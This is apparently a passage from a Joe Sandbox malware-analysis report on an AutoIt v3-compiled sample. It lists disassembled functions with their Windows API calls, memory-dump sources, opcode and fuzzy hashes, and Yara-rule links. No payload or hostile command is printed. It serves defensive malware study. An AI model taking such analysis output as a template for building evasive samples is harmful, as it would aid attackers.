                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DialogNtdllProc_
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3239928679-0
                                                                                                                      • Opcode ID: a3bcf79c1c2facbaaa30139bde799a19e52d699233795a85c4352f753b4c5171
                                                                                                                      • Instruction ID: ac2369deb1b634cdf69fd90d08029790ecf2d52f895ee2e760b891a2e6cba286
                                                                                                                      • Opcode Fuzzy Hash: a3bcf79c1c2facbaaa30139bde799a19e52d699233795a85c4352f753b4c5171
                                                                                                                      • Instruction Fuzzy Hash: 89E0E23420420CEFCB01EF88DC44E8A3BA5FB1A350F040064FD048B261D7B2A820DBA2
                                                                                                                      Function 0040F3AB Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • NtdllDialogWndProc_W.NTDLL ref: 0040F3D0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DialogNtdllProc_
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3239928679-0
                                                                                                                      • Opcode ID: d3b0322d6fdcf74f6fecbe7d120b209712c85f93e4921012a652af27c08ff92f
                                                                                                                      • Instruction ID: c9775029d188b9ee30539c206eaa0838f93dcdfbf27c91fe69147ef60aa18d53
                                                                                                                      • Opcode Fuzzy Hash: d3b0322d6fdcf74f6fecbe7d120b209712c85f93e4921012a652af27c08ff92f
                                                                                                                      • Instruction Fuzzy Hash: 8DE0E23420020CEFCB01EF88D844E8A3BA5FB1A350F040064FD048B262C7B2A860EBA2
                                                                                                                      Function 003BB845 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003BAF7D: GetWindowLongW.USER32(?,000000EB), ref: 003BAF8E
                                                                                                                        • Part of subcall function 003BB86E: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,003BB85B), ref: 003BB926
                                                                                                                        • Part of subcall function 003BB86E: KillTimer.USER32(00000000,?,00000000,?,?,?,?,003BB85B,00000000,?,?,003BAF1E,?,?), ref: 003BB9BD
                                                                                                                      • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,003BAF1E,?,?), ref: 003BB864
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2797419724-0
                                                                                                                      • Opcode ID: c2a67edee9065f28a6becc61df3c8df7e1c169b35940ea4e4721ea4f62b146d3
                                                                                                                      • Instruction ID: 9bb656e08c195391a2283b648076e8ea2ef8054a25aafb149c216a2c23399573
                                                                                                                      • Opcode Fuzzy Hash: c2a67edee9065f28a6becc61df3c8df7e1c169b35940ea4e4721ea4f62b146d3
                                                                                                                      • Instruction Fuzzy Hash: 84D0127124430C77DB113B61DC07F997A1DAB00795F508431F705AE5E19BB164619599
                                                                                                                      Function 003C8E19 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(?), ref: 003C8E1F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3192549508-0
                                                                                                                      • Opcode ID: 5a26626ac6e2a42c30fd1a764e629e92f7b853e8b994fcf63b6d6202b38c914d
                                                                                                                      • Instruction ID: 185b4b88872b5c067da09f9a1358ea5503e3efb3fde2370dcc438348b704a5e8
                                                                                                                      • Opcode Fuzzy Hash: 5a26626ac6e2a42c30fd1a764e629e92f7b853e8b994fcf63b6d6202b38c914d
                                                                                                                      • Instruction Fuzzy Hash: E4A0243000050CF7FF001F51FC044447F5CD7041507404070FC0C00031C733541145C5
                                                                                                                      Function 003CA937 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetProcessHeap.KERNEL32(003C6AE9,004567D8,00000014), ref: 003CA937
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HeapProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 54951025-0
                                                                                                                      • Opcode ID: f19f689fa3276dd11a8008173289ab92a5ca15fb8a5cf410eaf80c6f1d2b837e
                                                                                                                      • Instruction ID: 81e462d44828f3ebf80f20f8f887e52fd0ef7acf55a5960838ab14aad5b93a00
                                                                                                                      • Opcode Fuzzy Hash: f19f689fa3276dd11a8008173289ab92a5ca15fb8a5cf410eaf80c6f1d2b837e
                                                                                                                      • Instruction Fuzzy Hash: 73B012F07031024BD70C4B38AC5412B39D55749201341403DB003C2970EB308820DF04
                                                                                                                      Function 003C0EC4 Relevance: .3, Instructions: 345COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                      • Instruction ID: a33f091ea736dc1a56e4c7aeed88f6b605cc4604dacda8786260ffd206420810
                                                                                                                      • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                      • Instruction Fuzzy Hash: 5CC193772051E389DF2E4639C474A3EBBA15AA27B131B075DD4B2CB4C5EE24CE64E720
                                                                                                                      Function 003C12F9 Relevance: .3, Instructions: 341COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                      • Instruction ID: 92c386bbece9708540ceb6cc289de82c7b1d9aa6c57d4609856c05869d1f0765
                                                                                                                      • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                      • Instruction Fuzzy Hash: CCC1B6772051D389DF2E463A8474A3EBAA15AA37B131B075DD8B3CB5C5EE24CE24E710
                                                                                                                      Function 003C0A8F Relevance: .3, Instructions: 331COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                      • Instruction ID: ba848f100ac0a7ea750164fa55812e2a94680b9a58b59a7d665b71d7ac602a07
                                                                                                                      • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                      • Instruction Fuzzy Hash: 0FC1A4772092D389DF2E86398474A3EBAA15AA27B531B076DD4B3CB4C4EE14DE24D710
                                                                                                                      Function 003C0677 Relevance: .3, Instructions: 323COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                      • Instruction ID: 6b5bab716feb072366760cb2bb4bc694ef24474545576ef01b5d7433cbdf3f42
                                                                                                                      • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                      • Instruction Fuzzy Hash: 8CC1B2772052D389DF2E46398474A3EBAA15AA27B131B076DD4B3CB4D5EE24DE24C720
                                                                                                                      Function 003FA750 Relevance: 79.2, APIs: 40, Strings: 5, Instructions: 490filecommemoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 003FA7A5
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 003FA7B7
                                                                                                                      • DestroyWindow.USER32 ref: 003FA7C5
                                                                                                                      • GetDesktopWindow.USER32 ref: 003FA7DF
                                                                                                                      • GetWindowRect.USER32(00000000), ref: 003FA7E6
                                                                                                                      • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 003FA927
                                                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 003FA937
                                                                                                                      • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003FA97F
                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 003FA98B
                                                                                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 003FA9C5
                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003FA9E7
                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003FA9FA
                                                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003FAA05
                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 003FAA0E
                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003FAA1D
                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 003FAA26
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003FAA2D
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 003FAA38
                                                                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,88C00000), ref: 003FAA4A
                                                                                                                      • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0042D9BC,00000000), ref: 003FAA60
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 003FAA70
                                                                                                                      • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 003FAA96
                                                                                                                      • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 003FAAB5
                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003FAAD7
                                                                                                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003FACC4
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                      • String ID: $@U=u$AutoIt v3$DISPLAY$static
                                                                                                                      • API String ID: 2211948467-3613752883
                                                                                                                      • Opcode ID: 25e12538d7ce849bb945f8c2137e7c53c1af323596f23c11df0f8b5985b3f4ed
                                                                                                                      • Instruction ID: 9fd8eb6b5634f869ac3de01173e77481e476b3211cbffc1f1b2d82251a80fe8d
                                                                                                                      • Opcode Fuzzy Hash: 25e12538d7ce849bb945f8c2137e7c53c1af323596f23c11df0f8b5985b3f4ed
                                                                                                                      • Instruction Fuzzy Hash: 12028171A00208EFDB15DF64CC89EAE7BB9FF49310F148169F905AB2A1DB709D41CB64
                                                                                                                      Function 0040D095 Relevance: 59.8, APIs: 33, Strings: 1, Instructions: 260COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 0040D0EB
                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 0040D11C
                                                                                                                      • GetSysColor.USER32(0000000F), ref: 0040D128
                                                                                                                      • SetBkColor.GDI32(?,000000FF), ref: 0040D142
                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0040D151
                                                                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 0040D17C
                                                                                                                      • GetSysColor.USER32(00000010), ref: 0040D184
                                                                                                                      • CreateSolidBrush.GDI32(00000000), ref: 0040D18B
                                                                                                                      • FrameRect.USER32(?,?,00000000), ref: 0040D19A
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 0040D1A1
                                                                                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 0040D1EC
                                                                                                                      • FillRect.USER32(?,?,00000000), ref: 0040D21E
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0040D249
                                                                                                                        • Part of subcall function 0040D385: GetSysColor.USER32(00000012), ref: 0040D3BE
                                                                                                                        • Part of subcall function 0040D385: SetTextColor.GDI32(?,?), ref: 0040D3C2
                                                                                                                        • Part of subcall function 0040D385: GetSysColorBrush.USER32(0000000F), ref: 0040D3D8
                                                                                                                        • Part of subcall function 0040D385: GetSysColor.USER32(0000000F), ref: 0040D3E3
                                                                                                                        • Part of subcall function 0040D385: GetSysColor.USER32(00000011), ref: 0040D400
                                                                                                                        • Part of subcall function 0040D385: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0040D40E
                                                                                                                        • Part of subcall function 0040D385: SelectObject.GDI32(?,00000000), ref: 0040D41F
                                                                                                                        • Part of subcall function 0040D385: SetBkColor.GDI32(?,00000000), ref: 0040D428
                                                                                                                        • Part of subcall function 0040D385: SelectObject.GDI32(?,?), ref: 0040D435
                                                                                                                        • Part of subcall function 0040D385: InflateRect.USER32(?,000000FF,000000FF), ref: 0040D454
                                                                                                                        • Part of subcall function 0040D385: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0040D46B
                                                                                                                        • Part of subcall function 0040D385: GetWindowLongW.USER32(00000000,000000F0), ref: 0040D480
                                                                                                                        • Part of subcall function 0040D385: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0040D4A8
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 3521893082-2594219639
                                                                                                                      • Opcode ID: e7af8ee5c1a13c851ba2b40eaca7b60fbd941ce956f8c58a1bd539669c61c0d8
                                                                                                                      • Instruction ID: b6c8807c403196b907836dd096274ffea35a4a315e4be16f3b0a1168bce6dd8b
                                                                                                                      • Opcode Fuzzy Hash: e7af8ee5c1a13c851ba2b40eaca7b60fbd941ce956f8c58a1bd539669c61c0d8
                                                                                                                      • Instruction Fuzzy Hash: 8991D371908301FFC7209F64DC08E6BBBA9FF89325F500A29F962A61E0C775D946CB56
                                                                                                                      Function 003FA3F7 Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 284windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • DestroyWindow.USER32(00000000), ref: 003FA42A
                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 003FA4E9
                                                                                                                      • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 003FA527
                                                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 003FA539
                                                                                                                      • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 003FA57F
                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 003FA58B
                                                                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 003FA5CF
                                                                                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 003FA5DE
                                                                                                                      • GetStockObject.GDI32(00000011), ref: 003FA5EE
                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 003FA5F2
                                                                                                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 003FA602
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003FA60B
                                                                                                                      • DeleteDC.GDI32(00000000), ref: 003FA614
                                                                                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 003FA642
                                                                                                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 003FA659
                                                                                                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 003FA694
                                                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 003FA6A8
                                                                                                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 003FA6B9
                                                                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 003FA6E9
                                                                                                                      • GetStockObject.GDI32(00000011), ref: 003FA6F4
                                                                                                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 003FA6FF
                                                                                                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 003FA709
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
